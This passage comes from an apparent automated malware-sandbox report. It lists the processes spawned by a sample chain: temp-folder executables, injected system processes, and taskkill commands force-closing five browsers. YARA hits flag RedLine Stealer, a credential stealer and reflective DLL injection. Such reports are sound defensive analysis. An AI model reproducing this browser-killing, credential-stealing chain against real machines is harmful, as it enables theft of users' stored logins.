                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff684560000
                                                                                                                                                                                                                                                                                        File size:605'696 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                                        Start time:10:48:23
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff711d40000
                                                                                                                                                                                                                                                                                        File size:251'392 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                                        Start time:10:48:25
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff61dd60000
                                                                                                                                                                                                                                                                                        File size:605'696 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                                                        Start time:10:48:25
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff711d40000
                                                                                                                                                                                                                                                                                        File size:251'392 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                                        Start time:10:48:29
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff711d40000
                                                                                                                                                                                                                                                                                        File size:251'392 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                                                                        Start time:10:48:31
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff68e690000
                                                                                                                                                                                                                                                                                        File size:308'224 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FF1E7643A5C9294BD8E8FD743B323C8F
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                                                                        Start time:10:48:31
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6dab80000
                                                                                                                                                                                                                                                                                        File size:632'808 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                                                                        Start time:10:48:31
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6bcbd0000
                                                                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                                                                        Start time:10:48:31
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                                                                        Start time:10:48:31
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff609fd0000
                                                                                                                                                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000014.00000000.2216112963.00000000089A0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                                                                        Start time:10:48:32
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff711d40000
                                                                                                                                                                                                                                                                                        File size:251'392 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                                        Start time:10:48:39
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                        File size:1'985'024 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:5A3F6AA1107D91BDC0430E2A0C1F4F26
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 37%, ReversingLabs
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                                                                        Start time:10:48:40
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff61b980000
                                                                                                                                                                                                                                                                                        File size:308'224 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FF1E7643A5C9294BD8E8FD743B323C8F
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                                                                        Start time:10:48:40
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6bcbd0000
                                                                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                                                                        Start time:10:48:40
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6dab80000
                                                                                                                                                                                                                                                                                        File size:632'808 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                                                                        Start time:10:48:40
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                                        Start time:10:48:47
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x560000
                                                                                                                                                                                                                                                                                        File size:970'752 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:E477E0C89BDFE4F98170878F85624A0C
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 26%, ReversingLabs
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                                                                        Start time:10:48:48
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff711d40000
                                                                                                                                                                                                                                                                                        File size:251'392 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                                                                        Start time:10:48:49
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                                                        Imagebase:0xc20000
                                                                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                                                                        Start time:10:48:49
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                                                                        Start time:10:48:51
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7f4260000
                                                                                                                                                                                                                                                                                        File size:5'915'948 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:AE2A4249C8389603933DF4F806546C96
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 29%, ReversingLabs
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                                        Start time:10:48:52
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                                                                        Imagebase:0xc20000
                                                                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                                                                        Start time:10:48:52
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                                                                        Start time:10:48:52
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                                                                        Imagebase:0xc20000
                                                                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                                        Start time:10:48:52
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                                                                        Start time:10:48:52
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                                                                        Imagebase:0xc20000
                                                                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                                                                        Start time:10:48:52
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                                                                        Start time:10:48:53
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0xe50000
                                                                                                                                                                                                                                                                                        File size:307'712 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:F0AAF1B673A9316C4B899CCC4E12D33E
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 68%, ReversingLabs
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                                                                        Start time:10:48:53
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7f4260000
                                                                                                                                                                                                                                                                                        File size:5'915'948 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:AE2A4249C8389603933DF4F806546C96
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                                                                        Start time:10:48:53
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                                                                        Imagebase:0xc20000
                                                                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                                                                        Start time:10:48:54
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                                                                        Start time:10:48:55
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
